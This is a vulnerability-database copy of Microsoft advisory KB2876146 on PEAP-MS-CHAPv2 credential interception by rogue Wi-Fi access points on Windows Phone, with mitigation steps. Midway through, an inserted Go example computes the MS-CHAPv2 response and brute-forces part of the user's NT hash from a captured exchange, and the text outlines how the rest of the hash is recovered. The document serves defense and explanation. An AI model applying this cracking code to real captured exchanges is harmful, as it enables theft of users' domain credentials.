Executive Summary

Summary

Title: Wireless PEAP-MS-CHAPv2 Authentication Could Allow Information Disclosure
Name: KB2876146
Vendor: Microsoft
Severity (Vendor): N/A
Revision: 1.0
First vendor publication: 2013-08-04
Last vendor modification: 1970-01-01

Security-Database Scoring CVSS v3

CVSS vector: N/A
Overall CVSS score: NA
Base score: NA; Environmental score: NA
Impact sub score: NA; Temporal score: NA
Exploitability sub score: NA

Security-Database Scoring CVSS v2

CVSS vector: not defined
CVSS base score: not defined; Attack range: not defined
CVSS impact score: not defined; Attack complexity: not defined
CVSS exploit score: not defined; Authentication: not defined

Detail

General Information

Executive Summary

Microsoft is aware of a public report that describes a known weakness in the Wi-Fi authentication protocol known as PEAP-MS-CHAPv2 (Protected Extensible Authentication Protocol with Microsoft Challenge Handshake Authentication Protocol version 2), used by Windows Phone devices for WPA2 wireless authentication. In vulnerable scenarios, an attacker who successfully exploited this issue could obtain information from the targeted device, specifically the user's domain credentials. Microsoft is not aware of active attacks or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.

To exploit this issue, an attacker-controlled system could pose as a known Wi-Fi access point, causing the targeted device to automatically attempt to authenticate with it and so allowing the attacker to intercept the victim's encrypted domain credentials (the MS-CHAPv2 challenge-response that the device derives from the user's password). An attacker could then exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to recover the victim's domain credentials from that exchange. Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that resource.

Recommendation. Apply the suggested action to require a certificate verifying a wireless access point before starting an authentication process. Please see the Suggested Actions section of this advisory for more information.

Advisory Details

Affected Software

This advisory discusses the following devices.

Affected device operating systems:

  • Windows Phone 8
  • Windows Phone 7.8

Advisory FAQ

What is the scope of the advisory?
The purpose of this advisory is to notify customers that Microsoft is aware of a public report that describes a known weakness in the Wi-Fi authentication protocol known as PEAP-MS-CHAPv2. This issue affects Windows Phone devices running the operating systems listed in the Affected Software section.

Is this a security vulnerability that requires Microsoft to issue a security update?
No. This is not a security vulnerability that requires Microsoft to issue a security update. The issue is due to known cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol and is addressed through configuration changes on the wireless access points and on Windows Phone 8 devices.

What might an attacker use the issue to do?
In most scenarios, an attacker who successfully exploited this issue could obtain a victim's domain credentials from the targeted device. The attacker could re-use those credentials to authenticate to network resources and take any action that the user could take on that network resource.

How could an attacker exploit the issue?
An attacker-controlled system could pose as a known Wi-Fi access point, causing the victim's device to automatically attempt to authenticate with it, which lets the attacker intercept the victim's encrypted domain credentials. The attacker could then exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to recover the victim's domain credentials from the intercepted exchange.

What is PEAP-MS-CHAPv2?
PEAP-MS-CHAPv2 is the Extensible Authentication Protocol method most commonly used with WPA2-Enterprise (IEEE 802.1X) wireless protection. The device first opens a TLS tunnel through the access point to the network's authentication server (PEAP), then proves the user's domain user name and password inside that tunnel with an MS-CHAPv2 challenge-response, so that only authorized users and devices can join the wireless network. The TLS tunnel is what protects the MS-CHAPv2 exchange: if the device does not validate the server's certificate, an attacker's access point and authentication server can terminate the tunnel themselves and observe the exchange, which is why the suggested action in this advisory is server certificate validation.
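The exchange the preceding answers describe, worked as an added example that is not part of Microsoft's advisory: the MS-CHAPv2 NT-Response computation of RFC 2759 (the exchange PEAP carries inside its TLS tunnel), followed by the attacker's first step against a captured challenge and response. Inputs are the RFC 2759 section 9.2 test vectors (user "User", NT hash of the password "clientPass"); the NT hash is MD4(UTF-16LE(password)) and is given as a constant because Go's standard library has no MD4. Function names are this example's own.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// RFC 2759 section 9.2 test vectors: user "User", password "clientPass".
// RFCNTHash is MD4(UTF-16LE("clientPass")); it is given as a constant
// because Go's standard library has no MD4.
var (
	RFCAuthChallenge = mustHex("5B5D7C7D7B3F2F3E3C2C602132262628")
	RFCPeerChallenge = mustHex("21402324255E262A28295F2B3A337C7E")
	RFCNTHash        = mustHex("44EBBA8D5312B8D611474411F56989AE")
	RFCUserName      = "User"
)

func mustHex(s string) []byte {
	b, err := hex.DecodeString(s)
	if err != nil {
		panic(err)
	}
	return b
}

// desKey7to8 spreads 56 key bits over 8 bytes, leaving the low bit of each
// byte (the DES parity bit, which the cipher ignores) as zero.
func desKey7to8(k []byte) []byte {
	return []byte{
		k[0] & 0xFE,
		k[0]<<7 | k[1]>>1,
		k[1]<<6 | k[2]>>2,
		k[2]<<5 | k[3]>>3,
		k[3]<<4 | k[4]>>4,
		k[4]<<3 | k[5]>>5,
		k[5]<<2 | k[6]>>6,
		k[6] << 1,
	}
}

// desEncrypt8 is RFC 2759's DesEncrypt: one single-DES block encryption of
// the 8-byte challenge under a 7-byte key fragment.
func desEncrypt8(k7, clear []byte) []byte {
	block, err := des.NewCipher(desKey7to8(k7))
	if err != nil {
		panic(err) // the key is always 8 bytes, so this cannot fail
	}
	out := make([]byte, 8)
	block.Encrypt(out, clear)
	return out
}

// ChallengeHash (RFC 2759 section 8.2): the 8-byte challenge both sides
// derive from the peer challenge, the authenticator challenge and the user
// name. A rogue authentication server chooses the authenticator half itself.
func ChallengeHash(peer, auth []byte, userName string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(userName))
	return h.Sum(nil)[:8]
}

// NTResponse (RFC 2759 section 8.5): the 16-byte NT hash is zero-padded to
// 21 bytes and cut into three 7-byte DES keys, each encrypting the same
// challenge. The third key therefore contains only two secret bytes.
func NTResponse(challenge, ntHash []byte) []byte {
	z := make([]byte, 21)
	copy(z, ntHash)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt8(z[7*i:7*i+7], challenge)...)
	}
	return resp
}

// RecoverHashTail is the attacker's first step against a captured
// challenge and NT-Response: try all 65536 values of the two secret bytes
// of key 3 and return the pair that reproduces the last response block.
func RecoverHashTail(challenge, ntResponse []byte) ([]byte, bool) {
	for i := 0; i < 1<<16; i++ {
		k := []byte{byte(i >> 8), byte(i), 0, 0, 0, 0, 0}
		if bytes.Equal(desEncrypt8(k, challenge), ntResponse[16:24]) {
			return k[:2], true
		}
	}
	return nil, false
}

func main() {
	challenge := ChallengeHash(RFCPeerChallenge, RFCAuthChallenge, RFCUserName)
	resp := NTResponse(challenge, RFCNTHash)
	fmt.Printf("Challenge:   %X\n", challenge)
	fmt.Printf("NT-Response: %X\n", resp)
	// What a rogue access point and authentication server see: the challenge
	// (half of which they chose) and the 24-byte response.
	if tail, ok := RecoverHashTail(challenge, resp); ok {
		fmt.Printf("ntHash[14:16] = %X after at most 65536 DES trials\n", tail)
	}
}
```

Recovering ntHash[14:16] costs at most 2^16 DES operations. The remaining 14 bytes are two 7-byte DES keys that encrypt the same challenge, so a single pass over the 2^56 DES keyspace, checking each candidate against both of the first two response blocks, recovers them as well; that search is not performed here. The recovered NT hash is sufficient to complete MS-CHAPv2 as the user without ever learning the password, which is why the advisory treats the intercepted exchange as disclosure of the domain credentials. Server certificate validation, the page's suggested action, stops the phone from running this exchange with an attacker's authentication server in the first place.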

What is WPA2?
Wi-Fi Protected Access II (WPA2), the Wi-Fi Alliance certification of IEEE 802.11i, is a security protocol used to ensure the confidentiality of wireless network communication and is the successor to WPA.

Suggested Actions

To help protect against exploitation of the issue described in this advisory, apply one of the following suggested actions:

  • Require a certificate verifying a wireless access point before starting an authentication process from Windows Phone 8 devices

    A Windows Phone 8 device can be configured to validate a network access point, to help make sure the network is your company's network, before starting an authentication process. This is done by validating the certificate that your company's authentication server presents against a trusted root certificate installed on the phone. Only after the certificate has been validated are the user name and password sent to the authentication server, so the phone can connect to the Wi-Fi network.

    Issuing the certificate:

    Corporate IT issues the root certificate that can be used to validate the authentication server behind the wireless access point (the phone checks that the certificate the server presents during PEAP chains to this root). The certificate should have an easy-to-remember name, for instance "Contoso Corporate Root Certificate". It may already have been provisioned through the IT-managed MDM (Mobile Device Management) solution.

    The certificate can be distributed in an email message, which should also contain instructions from the IT department on how to turn on Wi-Fi certificate validation. For instance, the email message could contain the following steps.

    Configuring a Windows Phone 8 to require a certificate verifying a wireless access point:

    After receiving the root certificate from Corporate IT, each Windows Phone 8 user performs the following steps:

    Delete the previously configured Wi-Fi connection.

    1. In Settings, Wi-Fi, tap Advanced
    2. Tap and hold over the selected Wi-Fi network, and choose delete

    Create a new connection and enable server certificate validation.

    1. In Wi-Fi settings, tap the enterprise Wi-Fi network, which opens a sign-in page
    2. Enter username and password
    3. Toggle "Validate Server Certificate" to On
    4. Tap to choose a certificate
    5. In the list of certificates to select, pick the root certificate issued from Corporate IT (for example, "Contoso Corporate Root Certificate"), and tap Done

  • Turn off Wi-Fi in Windows Phone devices

    In Settings, Wi-Fi, tap to toggle "Wi-Fi networking" to Off

Original Source

Url : http://www.microsoft.com/technet/security/advisory/2876146.mspx

Alert History

Date / Information
2013-09-18 17:10:40
  • First insertion